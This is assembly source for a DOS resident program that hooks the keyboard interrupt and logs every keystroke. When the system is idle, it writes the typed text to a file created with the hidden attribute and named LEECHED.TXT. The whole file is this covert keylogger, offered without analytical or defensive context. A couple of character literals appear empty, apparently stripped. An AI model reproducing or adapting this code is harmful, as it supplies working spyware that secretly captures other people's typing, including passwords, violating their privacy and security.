; INT09MON.ASM
LOCALS
ASSUME cs:_TEXT, ds:_TEXT

BufferSize      equ     256
;******************************************************************************
_TEXT   segment word    public  'CODE'
org     100h

start:
        jmp     main_code
;******************************************************************************
NewInt09        proc    near
        push    es
        push    ax
        mov     ax, 40h
        mov     es, ax
        mov     ax, [es:1ch]
        mov     [cs:old_head], ax
        pop     ax
        pop     es
        pushf
        call    DWORD PTR [cs:OldInt09]    ; You CANNOT push anything other
                                           ; than the 1 flags before this call!
        push    ds
        push    es
        push    ax
        push    si
        push    bx

        mov     ax, cs
        mov     ds, ax
        mov     ax, 040h
        mov     es, ax
        mov     bx, [old_head]
        cmp     bx, [es:1ch]
        je      @@no_char

        mov     ax, [es:bx]
        cmp     al, 224         ; Cursor keys / Pg Up&Down return ASCII 224
        je      @@no_char       ; ignore them
        cmp     al, 10
        je      @@cr
        cmp     al, 13
        je      @@cr
        cmp     al, 32
        jae     @@norm_key      
@@other_key:
        mov     al, ''
        jmp     @@norm_key
@@cr:
        mov     al, ''

@@norm_key:
        mov     si, [waiting]
        cmp     si, BufferSize
        jge     @@no_char               ; Don't write past end of buffer
        mov     [buffer+si], al
        inc     [waiting]
@@no_char:
        pop     bx
        pop     si
        pop     ax
        pop     es
        pop     ds
        iret
NewInt09        endp

NewInt1c        proc    near
        push    ax
        push    bx
        push    cx
        push    ds
        mov     ax, [cs:CritErrSeg]
        mov     ds, ax
        mov     bx, [cs:CritErrOff]
        mov     ch, BYTE PTR [bx]
        mov     ax, [cs:InDosSeg]
        mov     ds, ax
        mov     bx, [cs:InDosOff]
        mov     cl, BYTE PTR [bx]
        cmp     cx, 0
        jne     @@not_this_time

        mov     ax, cs
        mov     ds, ax
        call    WriteBuffer

@@not_this_time:
        pop     ds
        pop     cx
        pop     bx
        pop     ax
        jmp     DWORD PTR [cs:OldInt1c]
NewInt1c        endp

NewInt28        proc    near
        push    ds
        push    ax
        mov     ax, cs
        mov     ds, ax
        call    WriteBuffer
        pop     ax
        pop     ds
        jmp     DWORD PTR[cs:OldInt28]
NewInt28        endp

WriteBuffer     proc    near
        push    ax
        push    bx
        push    cx
        push    dx

        cmp     [waiting], 12
        jb      @@not_this_time

        mov     ax, 3d01h
        mov     dx, OFFSET fn
        int     21h                     ; Open File
        jc      @@not_this_time
        mov     bx, ax

        mov     ax, 4202h
        xor     cx, cx
        xor     dx, dx
        int     21h                     ; Seek to EOF

        mov     ah, 40h
        mov     cx, [waiting]
        mov     [waiting], 0
        mov     dx, OFFSET buffer
        int     21h                     ; Write buffer

        mov     ah, 3eh
        int     21h                     ; Close File

@@not_this_time:
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        ret
WriteBuffer     endp
        
        fn              db      '\LEECHED.TXT',0
        buffer          db      BufferSize dup (?)
        waiting         dw      0
        oldInt09        dw      ?
                        dw      ?
        oldInt1c        dw      ?
                        dw      ?
        oldInt28        dw      ?
                        dw      ?
        InDosSeg        dw      ?
        InDosOff        dw      ?
        CritErrSeg      dw      ?
        CritErrOff      dw      ?
        old_head        dw      ?
        beep            db      7

label   End_Resident     byte
;******************************************************************************
main_code:
        mov     ax, cs
        mov     ds, ax

        mov     ah, 3ch
        mov     dx, OFFSET fn
        mov     cx, 02h         ; 02h = hidden
        int     21h             ; Create/Truncate the file
        jc      @@badopen
        mov     bx, ax
        mov     ah, 3eh
        int     21h             ; Close the file

        mov     ah, 34h
        int     21h
        mov     [InDosSeg], es
        mov     [InDosOff], bx

        push    ds
        mov     ax, 3d06h
        int     21h
        mov     [CritErrSeg], ds
        mov     [CritErrOff], si
        pop     ds

        mov     ax, 3509h
        int     21h
        mov     [OldInt09+2], es
        mov     [OldInt09], bx

        mov     ax, 351ch
        int     21h
        mov     [OldInt1c+2], es
        mov     [OldInt1c], bx

        mov     ax, 3528h
        int     21h
        mov     [OldInt28+2], es
        mov     [OldInt28], bx

        mov     dx, OFFSET NewInt09
        mov     ax, 2509h
        int     21h

        mov     dx, OFFSET NewInt1c
        mov     ax, 251ch
        int     21h

        mov     dx, OFFSET NewInt28
        mov     ax, 2528h
        int     21h

        mov     ah, 49h
        mov     es, ds:[2ch]    ; PSP:2ch = Segment of environment copy
        int     21h

        mov     ah, 09h
        mov     dx, OFFSET installed
        int     21h

        mov     ax, 3100h
        mov     dx, OFFSET end_resident
        mov     cl, 4
        shr     dx, cl
        inc     dx
        int     21h             ; TSR

@@badopen:
        mov     dl, al
        add     dl, '0'
        mov     ah, 06
        int     21h

        mov     ah, 09h
        mov     dx, OFFSET error
        int     21h

        mov     ax, 4c00h
        int     21h

        error   db      'Error opening file',13,10,'$'
        installed db    'Sucessfully installed',13,10,'$'
;******************************************************************************
_TEXT   ends

end Start

; END OF INT09MON.ASM
